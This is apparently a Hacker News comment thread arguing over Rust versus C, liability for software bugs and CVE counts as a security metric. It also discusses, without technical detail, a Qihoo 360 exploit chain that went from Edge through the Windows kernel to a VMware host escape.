
It's a matter of economics already.

There are safer, better alternatives for almost everything we do. But economy dictates that we end up with a compromise. Rust would be just another compromise, slightly different stage, no huge difference and potentially a huge cost.

Silver bullets in software development do not exist, rust is no exception to this and the irrational hyping of rust as being a silver bullet actually has the opposite effect.

If rust is that much better at all aspects of software development (and not just in preventing one class of bugs) then it will find mainstream adoption. But you don't get that effect by ramming it down other people's throats, you get that effect by showing it in practice. And this is where rust - at least so far - is underwhelming.

Also, and this is another point of irritation with me, the rust community makes it seem as if theirs is the only language that will avoid this kind of bug, which is far from true, there are other platforms / languages with far wider adoption that have these traits as well.


I'm not promoting Rust, nor have I actually written anything in it. I do think though it's a step in the right direction.

> But you don't get that effect by ramming it down other people's throats, you get that effect by showing it in practice.

I disagree. I've seen many C programmers who think that C is the be all end all of programming languages. Those people will not be convinced by showing them another technology that is better in practice. The fact that it's actually unbelievably hard to write correct software in C is somehow a point of pride for many people, though I speculate that few of them can actually follow through.

Of course there will always be logic bugs in software, even with formal systems and whatnot (i.e. bugs in the specifications). But memory bugs and the resulting security exploits could in many cases be a thing of the past already.

Many industries have similar regulations, i.e. seatbelts in cars. If somebody dies because of a faulty or non-existing seatbelt, there will be consequences. If somebody dies because they were talking on the phone and the car didn't prevent it, well, you can't control everything.

Is this a buffer overflow? Why was this written in C? No good answer - pay up.


> There are safer, better alternatives for almost everything we do. But economy dictates that we end up with a compromise. Rust would be just another compromise, slightly different stage, no huge difference and potentially a huge cost.

I think the argument is that the economics need to change. People need to stop being irresponsible - we need liability when someone is negligent, just like in any other engineering discipline.

> Silver bullets in software development do not exist, rust is no exception to this and the irrational hyping of rust as being a silver bullet actually has the opposite effect.

I keep seeing this, and yet I have not once seen anyone call it a silver bullet.

> Also, and this is another point of irritation with me, the rust community makes it seem as if theirs is the only language that will avoid this kind of bug, which is far from true, there are other platforms / languages with far wider adoption that have these traits as well.

Show me another language with no garbage collection, memory safety, C/C++ level performance that has been anything other than academic.


> I think the argument is that the economics need to change. People need to stop being irresponsible - we need liability when someone is negligent, just like in any other engineering discipline.

I totally agree with that and have been a long time proponent of liability for damage caused by software bugs.

But that would have to be all bugs, not just some classes of bugs.

> Show me another language with no garbage collection, memory safety, C/C++ level performance that has been anything other than academic.

D.

And by the way, rust is only 'memory safe' as long as you don't disable the safety mechanisms, so I think 'memory safe by default' would be a better way to describe it.


> I totally agree with that and have been a long time proponent of liability for damage caused by software bugs. But that would have to be all bugs, not just some classes of bugs.

Why? That goes against everything we've done to categorize bugs - we do not treat all bugs the same, and we would not consider all bugs to be due to negligence.

> D.

Only with a garbage collector or a 'safe' annotation. Rust has the opposite - a safe language by default.

> And by the way, rust is only 'memory safe' as long as you don't disable the safety mechanisms, so I think 'memory safe by default' would be a better way to describe it.

That's fine, memory safe by default is an acceptable way to refer to it. It's worth noting that I have written thousands of lines of rust code and never published code with a single line of unsafe. None of my projects have required it. So 'by default' is pretty powerful, since I've never ever needed to opt out.


> Why? That goes against everything we've done to categorize bugs - we do not treat all bugs the same, and we would not consider all bugs to be due to negligence.

That would be something you could only know by evaluating this on a bug-by-bug basis, the important thing to realize is that to an end user it simply does not matter what class of bug caused their data-loss, loss of privacy or loss of assets.


My point is that not all bugs lead to data loss or loss of privacy. But yes, I agree.

That said, I feel that we're now talking about memory safety vs semantic safety.

We can certainly prove a program is entirely memory safe. Rust's type system is proven, so the remaining work is to prove the unsafe code safe (this is actively being researched).

There is no way to prove all semantics of a program (Rice's theorem). Therefore I would argue that a bug due to a semantic issue is not necessarily negligence, whereas we could easily see memory safety issues from using C as a case of negligence.

But in terms of liability they would likely both fall into the same bucket.


Negligence in the legal sense of the word revolves around care. If someone is maintaining some codebase and causes a memory safety related bug you would have to look at that bug in isolation and what the person did to avoid it. Saying 'you should have rewritten this in rust in order to avoid liability' is not a standard of care that anybody will ever be held to.

So the ideal as you perceive it is so far from realistic that I do not believe pursuing that road is fruitful.

What we can do is class bugs (or actually, the results of bugs, the symptoms that cause quantifiable losses) in general as a source of (limited) liability. This will put those parties out of business that are unable to get their house in order without mandating one technology over another (which would definitely be seen as giving certain parties a competitive edge, something I don't think will be ever done).

So that's why I believe that solution is the better one.

But in a perfect world your solution would - obviously - be the better one, unfortunately we live in this one.


> Saying 'you should have rewritten this in rust in order to avoid liability' is not a standard of care that anybody will ever be held to.

Why is 'you should not have exposed C code to the internet' an unreasonable basis for care?

I'm not saying your approach is wrong, I think they're not mutually exclusive - your solution would provide incentive to not use C in a technology agnostic way. But at some point isn't it just irresponsible to write critical infrastructure, or code that exposes user information, in a language that has historically been a disaster for security?


> Why is 'you should not have exposed C code to the internet' an unreasonable basis for care?

Because it does not mesh with reality. There are 100's of millions of lines of C code exposed to the internet in all layers of the stack. So if you start off with a hardcore position like that you virtually ensure that your plan will not be adopted.

It's the legacy that is the problem, not the future.


That's one of the arguments for SaferCPlusPlus[1]. It's a (high performance) option for retrofitting memory safety to existing C/C++ codebases. It requires (straightforward) modifications to the existing code, but involves much less effort than a complete rewrite. A tool to (mostly) automate the required modifications is being worked on. (But more resources might hasten its progress, if any of those well-resourced entities wanted to redirect some of their efforts from vulnerability detection and mitigation to prevention :)

Just out of curiosity, what kind of performance penalty are people willing to accept in exchange for memory safety?

[1] shameless plug: https://github.com/duneroadrunner/SaferCPlusPlus


Statements like these always remind me of the FUSSP [0].

I'm not anything close to a developer (scripting to scratch my own itches is the extent of any "development" I do) so I can't claim to truly understand the issues other than generally, at a high-level.

I've heard variations of this argument -- "Rust will save us!", if I may exaggerate slightly -- many, many times and it seems to be occurring more often lately. It makes me genuinely wonder, then, why isn't the first priority to immediately begin work to rewrite all of the existing "legacy" code in Rust? IIUC, Mozilla has been working on rewriting Firefox in Rust -- which is A Good Thing(TM), it seems -- but that's the only major piece of software I've heard about.

If Rust truly is this panacea that it's often made out to be, why is code continuing to be written in anything other than Rust?

[0]: https://www.rhyolite.com/anti-spam/you-might-be.html


There are many, many factors that need to be taken into account when asking "will this technology succeed" and only one of those factors is "is the technology good/ better than what exists now".

Familiarity is a huge one that impacts adoption. There are many other factors discussed.

In the book The Diffusion Of Innovation there are two great examples given.

The first is a health official trying to convince a town of people to boil their water in order to avoid infection. They utterly failed to convince anyone to do so because the concept of 'germs' was totally unfamiliar to these people, and the need to boil water conflicted with their cultural conception of the issue.

The other is Dvorak - a keyboard layout that is, by some metric, objectively better than QWERTY. And yet adoption barely exists.

The reasons rust is not being used to replace C everywhere are many - Rust is young, many people do not want to learn rust, many people do not care about software security, rust has an unfamiliar syntax/ concepts in it, rust has a younger ecosystem, etc.

There is also the issue of liability in software. If I write an internet facing text-parser in C, and it's full of vulnerabilities, I am not liable. My negligence in technology choice (and I do consider it negligence) does not impact liability, unlike any other engineering discipline. So why change?


Every few years there is something. The sandbox, the VMs, Rust, etc.

Some things never change.


I don't think I'd want to take credit for a hack like this. I imagine a few interesting phone calls are heading the researchers' way.


They're a team from Qihoo 360, a large Chinese security company. They do a tonne of this kind of research, so I'd imagine the company is used to it by now.

If you look at pwn2own or similar for the last couple of years you'll see a variety of their teams cropping up...


"All started from and only by a controlled a website"

That is really scary. And another reason to limit/disable JavaScript (as if somebody still didn't have enough of them). Has anyone found a more detailed report? I'd love to see this in action.


Perfect storm.


> We used a JavaScript engine bug within Microsoft Edge to achieve the code execution inside the Edge sandbox, and we used a Windows 10 kernel bug to escape from it and fully compromise the guest machine," ...

What? The security of VMware relies on the security of the guest OS? Really a surprise, and a horrible one, for me.

btw, how many people are using the Edge browser? 1%? And how many of them use it in a VM? 1%%%? :-)


No, it does not. Here is the next sentence from the article:

"Then we exploited a hardware simulation bug within VMware to escape from the guest operating system to the host one. All started from and only by a controlled a website."


Thanks for the clarification.

So the key to the hack is a hardware simulation bug within VMware. Exploiting the security holes in Edge is not a surprise at all.


Edge isn't nearly the security nightmare that Internet Explorer was, and it runs sandboxed in a similar manner to Chrome, so you shouldn't underestimate the impressiveness of that first escape either.


Not even close. Just look at the CVE listings for 2016, Chrome vs Edge. Edge: 74 code execution vulnerabilities, Chrome: 2.


CVE listings are not a meaningful metric at all for security. What that could reflect is that Edge's bounty program is far more popular than Chrome's. It could mean that Edge is willing to hand out CVEs for unconfirmed bugs whereas Chrome requires further proof (I am not saying this is the case at all, to be clear).


If you have another metric, please offer it.

I have no reason to believe the metrics are biased. A similar number of issues appear for all browsers. The difference is the type of issue.

Of course you're free to just take it on faith that Edge is more secure because Microsoft says so, and that the CVE listings have no purpose being used as a comparison. But for me, without finding some other metric to compare by, I'll use this metric until there's a better replacement.


> If.you have another metric please offer it.

Evaluating the security of a product is a fairly rigorous task with no clear, objective 'this one is strictly more secure' outcome possible.

> I have no reason to believe the metrics are biased.

I gave you multiple reasons why they could be biased, based on a number of things. Not to mention that they seem flat out wrong - Chrome has dozens of security vulnerabilities patched every month. Maybe they don't create CVEs for all of them?

> Of course you're free to just take it on faith that Edge is more secure because Microsoft says so

I don't take it on their word. I have multiple reasons to believe that Edge is a pretty secure browser - I never said it is more secure than Chrome.

Here is a really solid post, that I felt was particularly unbiased, by Justin Schuh, who works for (or is the head of? Can't remember) Chrome's security team.

https://medium.com/@justin.schuh/securing-browsers-through-i...

As you can read, they both take fairly different approaches that are hard to compare objectively. Is a sandbox improvement more powerful than a new mitigation technique? Again, impossible to say. As Justin states, they're doing solid work though.

> that the CVE listings have no purpose being used as a comparison.

CVE has nothing to do with comparing the security of products and everything to do with notifying users of that products that they need to patch.

> But for me, without finding some other metric to compare by I'll use this metric until there's a better replacement

"I have no tools to compare, so I will use an arbitrary, incorrect tool to compare"

This is totally faulty logic. CVEs are not a metric for evaluating security and they were never intended for such a thing. If you want to actually evaluate software security it is a serious, real process that requires more discipline than saying "well some numbers that have no meaning should be good enough".


Are there any reasons Edge won't go open source? To avoid too many bugs being found?


You think that Edge is closed source to avoid more bugs being found, but Microsoft also pays 3rd party developers for finding bugs in Edge?


You didn't answer my question at all. Are there any special reasons Edge has not been open sourced yet?


I didn't really understand what your question was, it sounded as if you were trying to imply the reason yourself.

I do not work for Microsoft, I have no insight into their decision making process. I doubt it has to do with security.


The JavaScript engine is open source:

https://github.com/Microsoft/ChakraCore


Given that Chrome runs on many platforms, and Edge on only one, that makes this even more sobering.


This may not fit your preconceptions, but the article is saying that Edge is considered a difficult target for hacking.



As I said above, CVE listings are a useless metric for measuring safety of a product. High # of CVEs can easily indicate a safer product with a more mature bug bounty program or an attitude of "Assume it's vulnerable, don't require full exploits to prove it".

There is no good information to be drawn from those two links.


I think the key is having all three at once?


The last VM escape is very impressive on its own.



